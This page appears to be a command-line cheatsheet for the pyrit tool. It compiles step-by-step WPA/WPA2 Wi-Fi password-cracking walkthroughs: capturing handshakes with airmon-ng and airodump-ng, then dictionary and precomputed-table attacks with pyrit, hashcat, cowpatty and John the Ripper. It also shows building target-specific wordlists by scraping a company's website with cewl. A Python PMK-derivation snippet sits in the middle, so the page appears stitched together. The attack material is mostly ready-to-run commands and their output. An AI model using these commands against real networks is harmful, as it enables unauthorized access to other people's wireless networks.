🖥️pyrit
➡️This is a command-line reference manual for commands and command combinations that you don’t use often enough to remember them. This cheatsheet explains the pyrit command with important options and switches using examples.
11 minute read
▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁
# ██████╗ ██╗ ██╗██████╗ ██╗████████╗
# ██╔══██╗╚██╗ ██╔╝██╔══██╗██║╚══██╔══╝
# ██████╔╝ ╚████╔╝ ██████╔╝██║ ██║
# ██╔═══╝ ╚██╔╝ ██╔══██╗██║ ██║
# ██║ ██║ ██║ ██║██║ ██║
# ╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝
http://console-cowboys.blogspot.com/2011/01/more-wpa-cracking-techniques-jtr-pyrit.html
https://br-new.com/online/%E2%96%BA-kali-linux-cowpatty-genpmk-pyrit-vs-aircrack-ng-tutorial-deutsch-hd-YQ0jcgLbHqg.html
pyrit eval
pyrit -i <dictionary.txt> import_passwords
pyrit -e <ssid> create_essid
pyrit eval
pyrit batch
pyrit verify
pyrit -o <wpadb> export_hashdb
aircrack-ng -r <wpadb> <output01>.cap
Some useful resources
http://www.backtrack-linux.org/tutorials/usb-live-install/
http://www.backtrack-linux.org/downloads/
http://www.aircrack-ng.org/doku.php?id=airolib-ng
http://j2neon.blogspot.com/2011/07/cracking-wpa-using-pyrit-and-aircrack.html
https://xiaopan.co/forums/threads/crack-wpa2-know-your-target.2030/
http://adaywithtape.blogspot.com/2011/05/creating-wordlists-with-crunch-v30.html
./crunch 10 10 0123456789 -s 0125700000 -e 0125800000 -u | ./cowpatty -2 -f- -r <cap.file> -s <ESSID> -v
pyrit -r "yourcapture*.pcap" analyze
Reports the status of every handshake found in the capture(s) (good/workable/bad), for example:
pyrit -r handshake_NETGEAR83_2C-30-33-D5-7F-E4_2018-07-14T22-47-58.cap analyze
airmon-ng start wlan0
Monitor mode is now enabled on a new interface named wlan0mon.
Then start listening to all nearby wifi networks with the following command:
airodump-ng wlan0mon
This lists all wifi traffic nearby; wait until your target appears, then hit Ctrl+C.
Now listen only on the channel the target is on:
airodump-ng -c 2 --bssid 3C:1E:04:XX:XX:XX --write sommay wlan0mon
-c == channel number of the target (2 in my case, see the CH column)
--bssid == MAC address of the target AP
--write == name of the capture file
Wait until the WPA handshake is captured, then hit Ctrl+C.
A file named sommay-01.cap will now have been generated.
PYRIT
The first method to crack the password from the capture file is PYRIT. We will use a dictionary attack, so run:
pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough
-i == path to the input file, in our case the path to the dictionary
-r == path to the captured file (in our case sommay-01.cap)
attack_passthrough == specifies that a dictionary attack is to be performed
As you can see it has successfully cracked the password.
OCLHASHCAT
First of all download oclhashcat from its official website: https://hashcat.net/files/hashcat-2.00.7z
First we have to convert the .cap file we captured with airodump-ng previously to .hccap with aircrack-ng by command:
aircrack-ng sommay-01.cap -J sommay-01
-J == the path to the output file with extension .hccap
Now copy the dictionary you want to use in the Hashcat folder. Now enter in the hashcat folder and run command:
./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst
In the above command, if you are using a 32-bit system replace 64 with 32.
-m is the hash type, which is 2500 for WPA/WPA2 cracking
Then give the path to the .hccap file you converted with aircrack-ng, followed by the name of the dictionary file. As you can see it has successfully cracked the password.
COWPATTY
For cracking with the help of cowpatty we have to first generate the hash file specific to the target AP. For this we will use genpmk so run command:
genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY
-f == path to the dictionary file
-d == name of the output dictionary
-s == ESSID (name) of the target AP (it must be identical to the target AP's ESSID)
Now it will generate a dictionary file named cowpatty_dict which will speed up the cracking process.
Now run command:
cowpatty -d cowpatty_dict -r sommay-01.cap -s SOMMAY
-d == path to the dictionary we generated with genpmk
-r == path to the capture file we generated with airodump-ng
-s == ESSID of the target AP (it must be identical to the target AP's ESSID)
#########################
WPA JTR/Pyrit/cowpatty uses and cracking interoperability
Below are a bunch of ways to inter-operate between pyrit/cowpatty/jtr with various attacking and exporting techniques. I recently figured these out while having to juggle all kinds of cracking issues. A few weeks ago I was performing a wireless pentest and came across a rather standard WPA PSK network. However, this came with issues that spawned into learning a bunch of new command line usages for various tools in conjunction with one another, for the end goal of a simple WPA key retrieval.
The issue I was having, which required me to expand my wireless toolset, was that programs across various operating systems were behaving differently or just plain not working at all. For example my cracker of choice is generally CowPatty, but for some reason (and I hope one of the readers of this blog can tell me why) CowPatty was behaving differently between my OSX, standard Linux distro and my BT4 R2 VMware. This is also the reason for the last post on GPU CUDA via OSX. So below are various ways to use different programs for WPA cracking related gymnastics of sorts.
Standard Cracking:
Firstly we have our standard way of cracking WPA, we can use CowPatty to determine if we have a handshake and then crack the password.
Check if we have a handshake with the -c option:
cowpatty -r Capture.cap -c -s SSID
cowpatty 4.6 - WPA-PSK dictionary attack.
Collected all necessary data to mount crack against WPA/PSK passphrase
Try to Crack the password:
Now if we are sure we have a valid handshake we can crack the hash with a dictionary file. Using the following cmdline.
cowpatty -r Capture.cap -f dictionary.txt -s SSID
Starting dictionary attack. Please be patient.
key no. 1000: Anglo-spanish
Unable to identify the PSK from the dictionary file. Try expanding your
passphrase list, and double-check the SSID. Sorry it did not work out.
1786 passphrases tested in 8.04 seconds: 222.04 passphrases/second
My problem was that CowPatty in anything other than my BT4 r2 vmware was not properly finding the handshake.
cowpatty -r Capture.cap -c -s SSID
End of pcap capture file, incomplete four-way handshake exchange. Try using a
different capture.
Hmm, CowPatty is misbehaving on my regular machine, which is where I would want to pre-compute hashes and perform my cracking due to the greater memory and cores available on my primary system. I do not want to crack any passwords inside of a vmware unless it's precomputed, and I certainly do not want to try to compute hashes on a vmware either. So I decided to check another popular WPA cracking tool, Pyrit, against the password hash file.
Using Pyrit for cracking instead:
pyrit -r Capture.cap -i dictionary.txt attack_passthrough
This command was also failing on every single system for unknown reasons at the time. So I decided I was going to have to use Pyrit to Precompute hashes and then use those precomputed hashes inside of a vmware on cowpatty. Interestingly enough you can export pyrit hashtables in various formats to be used with airolib and cowpatty.
Pyrit Usage for Hashtables and cracking:
Pyrit is extremely useful for a few reasons, most importantly being that you can resume functionality such as creating hashtables if for some reason you have to stop an operation and unplug or shutdown your machine. You can simply quit pyrit like any other program, but pyrit will remember where it left off in its hashtable computing. No need to leave your machine in one place running for hours or days. Simply quit and resume at will.
Create a database of SSID’s for attack:
pyrit -e essid create_essid
Add dictionary words to be hashed:
pyrit -i dictionaryFile import_passwords
These 2 commands will create a dictionary of SSID and password values used in a standard attack or for precomputation of hashtables. Another nice feature of pyrit is that you can keep running the dictionary command to add in as many dictionary files as you have available. Pyrit will remove duplicate entries and will also remove passwords that cannot be used in a WPA protected network, such as passwords below 8 characters. This is fantastic, as you won’t waste processor cycles on passwords that are useless.
Create hashtables:
pyrit batch
The previous command will create hashtables of everything in the database for the given SSID values in the database. At any point during this operation you can quit and resume simply by killing the operation and typing in the previous command again, pyrit will pick up where it left off. Once this is completed you can directly use Pyrit to attack a handshake or in my case pyrit was not recognizing the capture file so I had to export the database in cowpatty format with the following command.
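To make concrete why the -s / -e value must match the target ESSID exactly and why pyrit throws away passwords under 8 characters on import, here is an added example (not code from the page, pyrit or genpmk) of the PMK derivation that genpmk and pyrit batch precompute, together with the import filter; it assumes only the Python standard library and checks itself against the published IEEE 802.11i test vector (passphrase "password", SSID "IEEE").

```python
# Added example: the per-ESSID PMK computation behind genpmk / pyrit batch,
# plus the candidate filter pyrit applies on import_passwords.
import hashlib

PMK_ITERATIONS = 4096   # PBKDF2 rounds fixed by IEEE 802.11i for WPA-PSK
PMK_LENGTH = 32         # 256-bit Pairwise Master Key

def is_valid_psk_passphrase(passphrase: str) -> bool:
    """WPA-PSK passphrases are 8..63 printable ASCII characters; anything
    else can never be a valid key, so a cracker skips it on import."""
    if not 8 <= len(passphrase) <= 63:
        return False
    return all(32 <= ord(c) <= 126 for c in passphrase)

def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 rounds, 32 bytes).
    The ESSID is the salt: a table computed for one network name is useless
    against any other, which is why -s / -e must match byte for byte."""
    if not is_valid_psk_passphrase(passphrase):
        raise ValueError("passphrase must be 8-63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               essid.encode("utf-8"), PMK_ITERATIONS, PMK_LENGTH)

def import_candidates(lines):
    """Mimic pyrit import_passwords: drop duplicates and entries that can
    never be a WPA-PSK passphrase, keeping first-seen order."""
    seen, kept = set(), []
    for line in lines:
        word = line.rstrip("\r\n")
        if word in seen or not is_valid_psk_passphrase(word):
            continue
        seen.add(word)
        kept.append(word)
    return kept

def precompute_table(candidates, essid):
    """What a genpmk / cowpatty hash table holds: passphrase -> PMK for ONE ESSID."""
    return {word: derive_pmk(word, essid) for word in candidates}

if __name__ == "__main__":
    # Constructed sample wordlist: one duplicate and two entries that are too short.
    sample = ["password\n", "short\n", "password\n", "Anglo-spanish\n", "1234567\n"]
    table = precompute_table(import_candidates(sample), "IEEE")
    for word, pmk in table.items():
        print(f"{word:15s} {pmk.hex()}")
```

The defender's reading of this: a non-default ESSID makes every precomputed table on this page network-specific, and the 4096 HMAC rounds per candidate are what make a long, random passphrase hold up against the dictionary runs shown above.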
Using pyrit to crack:
pyrit -r capture.cap attack_db
Exporting different hashtable formats:
As I stated pyrit cracking didn’t work for me due to complications on the way pyrit parsed the capture file, the pyrit command would fail every time and not recognize the handshake. So I exported the hashtable database for use with cowpatty.
Cowpatty export:
pyrit -e essid -o hashes.cow export_cowpatty
Note that you can also export to airolib format if you prefer using the aircrack suite of tools to do your pre-computed cracking: just switch out the export_cowpatty command for the airolib export (export_hashdb, as in the command list at the top of this page). Until I got pyrit working correctly I preferred to use cowpatty, so I exported to my preferred format.
CowPatty File Size Issue:
Apparently when using 32 bit systems and hash file sizes over 2 gigs cowpatty will not work. So when I tried to directly attack the WPA PSK with the hashfile I was given an error “Could not stat hashfile. Check file path”.
cowpatty -r Capture.cap -d hashes.cow -s SSID
cowpatty 4.6 - WPA-PSK dictionary attack.
cowpatty: Could not stat hashfile. Check file path.
File Size WorkAround:
One way around this annoying issue was to pipe your hashfile into the STDIN value of CowPatty by outputting the hashfile with the unix “cat” command. You can do this by specifying the dash character as the input dictionary file in CowPatty. I found this to be very useful for a few reasons I will show next.
CowPatty with STDIN:
cat hashes.cow | cowpatty -d - -r capture.cap -s SSID
Using the previous command you can bypass the filesize restriction and use precomputed hashfiles of larger sizes. But STDIN can also be used for other cracking methods, such as running custom bruteforcing of password files with JTR. By taking a dictionary and running it through the rules option of JTR, additional characters such as numbers will be added to each word in your dictionary file. Although this may not be feasible due to the slow nature of password cracking without precomputed hashes, it is an option if dictionary files are not finding the password for you.
JTR STDOUT with CowPatty STDIN:
In the john directory type:
./john --wordlist=wordlist --stdout --rules | cowpatty -f - -r capture.cap -s SSID
Custom password list creation:
Another option would be to create a custom password list out of your current password list using JTR rules and then batch them with pyrit shown earlier in this blog post. You can create a custom password list by just using STDOUT to a new password file.
In the john directory type:
./john --wordlist=dictionary.txt --stdout --rules > newpasslist.txt
Then add these new passwords to your pyrit dictionary and re-batch the new passwords with the same commands shown previously. This may help in situations where users choose passwords such as password4, which isn’t a dictionary word but is certainly an easy password to guess.
Custom passwords via webpages:
You could also create yourself custom password lists via scraping the company's website or the system administrator's personal webpages. It's not too hard to find out who the administrator is: make a few phone calls or check the company's webpage for listings of employees. Once a page is found you can scrape the page for passwords with a tool by the name of CEWL. Although I don’t condone the use of Ruby (you may catch a weird disease or feel really dirty after using it, yuuuk ruby), this is a useful tool for creating a custom password list.
./cewl.rb -d 1 -w passwordList.txt website.com
Cewl will create a custom password list named “passwordList.txt” which you can then run through john to add more passwords with numbers before batching the new passwords with pyrit. Pyrit will get rid of the useless passwords for you during password import.
The pyrit cracking issue:
I believe the cracking and parsing issue in pyrit was due to the version of pyrit that I was using. For me the only version of pyrit that functions correctly is the SVN version of pyrit currently available on the pyrit site. Any other version failed to work correctly for both parsing and for GPU cracking... See the previous post on this blog for getting your OSX machine to work with GPU and Pyrit. What this will do for you is allow you to efficiently crack passwords in pyrit with much quicker speeds even when passwords are not precomputed.
############################
#==============================##==============================#
# CMD PYRIT #
#==============================##==============================#
Cheatsheets are an excellent complement to other information sources like Linux man-pages, Linux help, or How-To’s and tutorials, as they provide compact and easily accessible information. While man-pages and detailed tutorials often contain comprehensive explanations and extensive guides, cheatsheets summarize the most important options for the command pyrit in a clear format. This allows users to quickly access the needed information for pyrit without having to sift through lengthy texts. Especially in stressful situations or for recurring tasks, cheatsheets for pyrit are a valuable resource to work efficiently and purposefully.